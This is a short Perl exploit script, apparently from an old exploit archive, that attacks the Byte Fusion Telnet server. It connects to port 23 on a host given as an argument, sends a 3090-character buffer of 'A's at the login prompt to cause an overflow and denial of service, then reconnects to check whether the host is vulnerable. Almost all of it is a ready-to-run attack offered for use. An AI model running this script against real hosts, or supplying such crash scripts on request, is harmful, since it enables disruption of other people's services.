# Example for a possible DOS-attack against Byte Fusion Telnet. # There need to be 3090 characters to overflow Server. # Example : Trying example.com... # Connected to example.com. # Escape character is '^]'. # Byte Fusion Telnet, Copyright 1999 Byte Fusion Corporation # Unregistered Evaluation. See www.bytefusion.com/telnet.html # (Machine name) Login: [more then 3090 characters] # Overflow use IO::Socket; print "Possible DOS-attack against Byte Fusion Telnet\n"; print "++++++++++++++++++++++++++++++++++++++++++++++\n"; if (not $ARGV[0]) { print "Usage: $0 [host]\n\n"; exit(0); } sub connecthost { $host = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ARGV[0], PeerPort => "23",) or die "Can't open connection to $ARGV[0] because $!\n"; $host->autoflush(1); } $bufferoverflow .= "A" x 3090; print "\nOpen connection...\n"; &connecthost; print "Sending characters...\n"; print $host "$bufferoverflow\n"; print "close connection...\n"; close $host; print "\nTesting...\n"; &connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n"); close $host; die "The host $ARGV[0] is not vulnerable to this attack.\n"; # by arbon(arbon@gmx.de)